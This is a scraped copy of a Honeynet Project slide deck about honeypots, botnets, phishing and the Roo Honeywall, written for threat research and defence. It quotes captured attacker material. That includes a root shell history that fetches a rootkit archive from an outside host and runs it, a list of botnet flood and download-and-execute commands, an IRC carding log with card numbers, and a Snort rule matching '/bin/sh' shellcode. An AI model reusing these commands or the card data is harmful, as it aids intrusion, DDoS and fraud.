Docstoc

Honeynets and The Honeynet Project.ppt

Document Sample
Honeynets and The Honeynet Project.ppt Powered By Docstoc
					   Honeynets and
The Honeynet Project
Speaker




          2
              Purpose

To explain our organization, our value to
        you, and our research.




                                            3
              Agenda
• The Honeynet Project and Research
  Alliance
• The Threat
• How Honeynets Work
• Learning More




                                      4
Honeynet Project




                   5
               Problem

How can we defend against an enemy, when
   we don’t even know who the enemy is?




                                           6
      Mission Statement

To learn the tools, tactics, and motives
   involved in computer and network
attacks, and share the lessons learned.




                                           7
                 Our Goal
Improve security of Internet at no cost to the
public.

• Awareness: Raise awareness of the threats
  that exist.
• Information: For those already aware, we teach
  and inform about the threats.
• Research: We give organizations the
  capabilities to learn more on their own.
                                                 8
              Honeynet Project
• Non-profit (501c3) organization with Board of
  Directors.
• Funded by sponsors
• Global set of diverse skills and experiences.
• Open Source, share all of our research and findings at
  no cost to the public.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have nothing to sell.

                                                     9
  Honeynet Research Alliance
Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying
honeypot technologies.



     http://www.honeynet.org/alliance/


                                               10
             Alliance Members
•   South Florida Honeynet Project
•   Georgia Technical Institute
•   Azusa Pacific University
•   USMA Honeynet Project
•   Pakistan Honeynet Project
•   Paladion Networks Honeynet Project (India)
•   Internet Systematics Lab Honeynet Project (Greece)
•   Honeynet.BR (Brazil)
•   UK Honeynet
•   French Honeynet Project
•   Italian Honeynet Project
•   Portugal Honeynet Project
•   German Honeynet Project
•   Spanish Honeynet Project
•   Singapore Honeynet Project
                                                         11
•   China Honeynet Project
The Threat




             12
       What we have captured

• The Honeynet Project has captured
  primarily external threats that focus on
  targets of opportunity.

• Little has yet to be captured on advanced
  threats, few honeynets to date have been
  designed to capture them.


                                              13
                The Threat
• Hundreds of scans a day.
• Fastest time honeypot manually compromised,
  15 minutes (worm, under 60 seconds).
• Life expectancies: vulnerable Win32 system is
  under three hours, vulnerable Linux system is
  three months.
• Primarily cyber-crime, focus on Win32 systems
  and their users.
• Attackers can control thousands of systems
  (Botnets).
                                            14
The Threat




             15
              The Motive

• Motives vary, but we are seeing more and
  more criminally motivated.
• Several years ago, hackers hacked
  computers. Now, criminals hack
  computers.
• Fraud, extortion and identity theft have
  been around for centuries, the net just
  makes it easier.
                                             16
               DDoS for Money


J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline
      for this amount of time”
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not
      make money off of it?
J4ck: I know plenty of people that'd pay exorbatent
      amounts for packeting




                                                   17
                The Target

• The mass users.
• Tend to be non-security aware, making
  them easy targets.
• Economies of scale (it’s a global target).




                                               18
          Interesting Trends

• Attacks often originate from economically
  depressed countries (Romania is an
  example).
• Attacks shifting from the computer to the
  user (computers getting harder to hack).
• Attackers continue to get more
  sophisticated.


                                              19
                The Tools

• Attacks used to be primarily worms and
  autorooters.

• New advances include Botnets and
  Phishing.

• Tools are constantly advancing.

                                           20
                            The Old Days

Jan   8   18:48:12   HISTORY:   PID=1246   UID=0   lynx www.becys.org/LUCKROOT.TAR
Jan   8   18:48:31   HISTORY:   PID=1246   UID=0   y
Jan   8   18:48:45   HISTORY:   PID=1246   UID=0   tar -xvfz LUCKROOT.TAR
Jan   8   18:48:59   HISTORY:   PID=1246   UID=0   tar -xzvf Lu
Jan   8   18:49:01   HISTORY:   PID=1246   UID=0   tar -xzvf L
Jan   8   18:49:03   HISTORY:   PID=1246   UID=0   tar -xzvf LUCKROOT.TAR
Jan   8   18:49:06   HISTORY:   PID=1246   UID=0   cd luckroot
Jan   8   18:49:13   HISTORY:   PID=1246   UID=0   ./luckgo 216 210
Jan   8   18:51:07   HISTORY:   PID=1246   UID=0   ./luckgo 200 120
Jan   8   18:51:43   HISTORY:   PID=1246   UID=0   ./luckgo 64 120
Jan   8   18:52:00   HISTORY:   PID=1246   UID=0   ./luckgo 216 200




                                                                            21
                 Botnets

• Large networks of hacked systems.
• Often thousands, if not tens of thousands,
  of hacked systems under the control of a
  single user.
• Automated commands used to control the
  ‘zombies’.



                                               22
              How They Work

• After successful exploitation, a bot uses TFTP,
  FTP, or HTTP to download itself to the
  compromised host.
• The binary is started, and connects to the hard-
  coded master IRC server.
• Often a dynamic DNS name is provided rather
  than a hard coded IP address, so the bot can be
  easily relocated.
• Using a special crafted nickname like
  USA|743634 the bot joins the master's channel,
  sometimes using a password to keep strangers
  out of the channel                                 23
              80% of traffic

•   Port 445/TCP
•   Port 139/TCP
•   Port 135/TCP
•   Port 137/UDP

• Infected systems most often WinXP-SP1
  and Win2000

                                          24
                                      Bots
ddos.synflood [host] [time] [delay] [port]
starts an SYN flood

ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts a HTTP flood

scan.listnetranges
list scanned netranges

scan.start
starts all enabled scanners

scan.stop
stops all scanners

http.download
download a file via HTTP

http.execute
updates the bot via the given HTTP URL

http.update
executes a file from a given HTTP URL

cvar.set spam_aol_channel [channel]
AOL Spam - Channel name

cvar.set spam_aol_enabled [1/0]                                      25
AOL Spam - Enabled?
               Numbers

• Over a 4 months period
  • More then 100 Botnets were tracked
  • One channel had over 200,000 IP
    addresses.
  • One computer was compromised by 16
    Bots.
  • Estimate over 1 millions systems
    compromised.


                                         26
          Botnet Economy

• Botnets sold or for rent.
• Saw Botnets being stolen from each other.
• Observed harvesting of information from
  all compromised machines. For example,
  the operator of the botnet can request a
  list of CD-keys (e.g. for Windows or
  games) from all bots. These CD-keys can
  be sold or used for other purposes since
  they are considered valuable information.
                                              27
                   Phishing

• Social engineer victims to give up valuable
  information (login, password, credit card number,
  etc).

• Easier to hack the user then the computers.

• Need attacks against instant messaging.

            http://www.antiphishing.org

                                                      28
The Sting




            29
Getting the Info




                   30
             Infrastructure

• Attackers build network of thousands of
  hacked systems (often botnets).
• Upload pre-made pkgs for Phishing.
• Use platforms for sending out spoofed
  email.
• Use platforms for false websites.



                                            31
                     A Phishing Rootkit
•   -rw-r--r--   1   free   web   14834 Jun 17 13:16 ebay only
•   -rw-r--r--   1   free   web   247127 Jun 14 19:58 emailer2.zip
•   -rw-r--r--   1   free   web   7517 Jun 11 11:53 html1.zip
•   -rw-r--r--   1   free   web   10383 Jul 3 19:07 index.html
•   -rw-r--r--   1   free   web   413 Jul 18 22:09 index.zip
•   -rw-r--r--   1   free   web   246920 Jun 14 20:38 massmail.tgz
•   -rw-r--r--   1   free   web   8192 Jun 12 07:18 massmail.zip
•   -rw-r--r--   1   free   web   12163 Jun 9 01:31 send.php
•   -rw-r--r--   1   free   web   2094 Jun 20 11:49 sendspamAOL1.tgz
•   -rw-r--r--   1   free   web   2173 Jun 14 22:58 sendspamBUN1.tgz
•   -rw-r--r--   1   free   web   2783 Jun 15 00:21 sendspamBUNzip1.zip
•   -rw-r--r--   1   free   web   2096 Jun 16 18:46 sendspamNEW1.tgz
•   -rw-r--r--   1   free   web   1574 Jul 11 01:08 sendbank1.tgz
•   -rw-r--r--   1   free   web   2238 Jul 18 23:07 sendbankNEW.tgz
•   -rw-r--r--   1   free   web   83862 Jun 9 09:56 spamz.zip
•   -rw-r--r--   1   free   web   36441 Jul 18 00:52 usNEW.zip
•   -rw-r--r--   1   free   web   36065 Jul 11 17:04 bank1.tgz
•   drwxr-xr-x   2   free   web   49 Jul 16 12:26 banka
•   -rw-r--r--   1   free   web   301939 Jun 8 13:17 www1.tar.gz
•   -rw-r--r--   1   free   web   327380 Jun 7 16:24 www1.zip


                                                                          32
             Credit Cards Exchanging

04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box
126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All
This ccs update everyday From My Hacked shopping Database - You must
regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard
(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS
Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :
*** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :
9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)




                                                                          33
                The Future

• Hacking is profitable and difficult to get
  caught.

• Expect more attacks to focus on the end
  user or the client.

• Expect things to get worse, bad guys
  adapt faster.
                                               34
Honeynets




            35
                   Honeypots
• A honeypot is an information system resource
  whose value lies in unauthorized or illicit use of
  that resource.

• Has no production value, anything going to or from
  a honeypot is likely a probe, attack or compromise.

• Primary value to most organizations is information.


                                                       36
                 Advantages

•   Collect small data sets of high value.
•   Reduce false positives
•   Catch new attacks, false negatives
•   Work in encrypted or IPv6 environments
•   Simple concept requiring minimal resources.



                                              37
            Disadvantages

• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)




                                             38
                     Types

• Low-interaction
  • Emulates services, applications, and OS’s.
  • Low risk and easy to deploy/maintain, but
    capture limited information.

• High-interaction
  • Real services, applications, and OS’s
  • Capture extensive information, but high
    risk and time intensive to maintain.
                                                 39
         Examples of Honeypots

                           Low Interaction

•   BackOfficer Friendly
•   KFSensor
•   Honeyd
•   Honeynets

                           High Interaction
                                              40
                Honeynets

• High-interaction honeypot designed to capture
  in-depth information.
• Information has different value to different
  organizations.
• Its an architecture you populate with live
  systems, not a product or software.
• Any traffic entering or leaving is suspect.

                                            41
             How it works

A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.

• Data Control
• Data Capture
• Data Analysis

    http://www.honeynet.org/papers/honeynet/
                                               42
Honeynet Architecture




                        43
              Data Control

• Mitigate risk of honeynet being used to
  harm non-honeynet systems.

• Count outbound connections.
• IPS (Snort-Inline)
• Bandwidth Throttling*


                                            44
No Data Control




                  45
Data Control




               46
             Snort-Inline


alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named";flags: A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";


alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named";flags: A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
replace:"|0000 E8D7 FFFFFF|/ben/sh";)



                                              47
               Data Capture

• Capture all activity at a variety of levels.

• Network activity.
• Application activity.
• System activity.




                                                 48
                   Sebek

• Hidden kernel module that captures all
  host activity
• Dumps activity to the network.
• Attacker cannot sniff any traffic based on
  magic number and dst port.




                                               49
Sebek Architecture




                     50
          Honeywall CDROM

• Attempt to combine all requirements of a
  Honeywall onto a single, bootable
  CDROM.

• May, 2003 - Released Eeyore
• May, 2005 - Released Roo



                                             51
          Eeyore Problems

• OS too minimized, almost crippled. Could
  not easily add functionality.
• Difficult to modify since LiveCD.
• Limited distributed capabilities
• No GUI administration
• No Data Analysis
• No international or SCSI support

                                             52
      Roo Honeywall CDROM

• Based on Fedora Core 3
• Vastly improved hardware and
  international support.
• Automated, headless installation
• New Walleye interface for web based
  administration and data analysis.
• Automated system updating.

                                        53
                Installation

• Just insert CDROM and boot, it installs to
  local hard drive.
• After it reboots for the first time, it runs a
  hardening script based on NIST and CIS
  security standards.
• Following installation, you get a command
  prompt and system is ready to configure.


                                                   54
First Boot




             55
Install




          56
Configure




            57
      3 Methods to Maintain

• Command Line Interface
• Dialog Interface
• Web GUI (Walleye)




                              58
     Command Line Interface

• Local or SSH access only.
• Use the utility hwctl to modify
  configurations and restart services.

     # hwctl HwTCPRATE=30



                                         59
Dialog Menu




              60
Data Administration




                      61
             Data Analysis

• Most critical part, the purpose of a
  honeynet is to gather information and
  learn.
• Need a method to analyze all the different
  elements of information.
• Walleye is the new solution, comes with
  the CDROM.


                                               62
Walleye




          63
Data Analysis




                64
Data Analysis Flows




                      65
Data Analysis Details




                        66
Processes




            67
Files




        68
Distributed Capabilities




                           69
                  Issues
• Require extensive resources to properly
  maintain.
• Detection and anti-honeynet technologies
  have been introduced.
• Can be used to attack or harm other non-
  Honeynet systems.
• Privacy can be a potential issue.


                                             70
    Legal Contact for .mil / .gov
Department of Justice; Computer Crime and
 Intellectual Property Section.

  • Paul Ohm
     • Number: (202) 514.1026
     • E-Mail: paul.ohm@usdoj.gov




                                            71
Learning More




                72
             Our Website
• Know Your Enemy papers.
• Scan of the Month Challenges
• Latest Tools and Technologies

          http://www.honeynet.org/




                                     73
Our Book




  http://www.honeynet.org/book




                          74
Sponsoring




     Advanced Network Management Lab




YOU?
                                       75
           How to Sponsor

• Sponsor development of a new tool
• Sponsor authorship of a new research
  paper.
• Sponsor research and development.

• Buy our book

             <project@honeynet.org>
          http://www.honeynet.org/funds/
                                           76
               Conclusion

The Honeynet Project is a non-profit, research
organization improving the security of the
Internet at no cost to the public by providing
tools and information on cyber security threats.




                                             77
http://www.honeynet.org
    <project@honeynet.org>




                             78

				
yanyan yan yanyan yan
About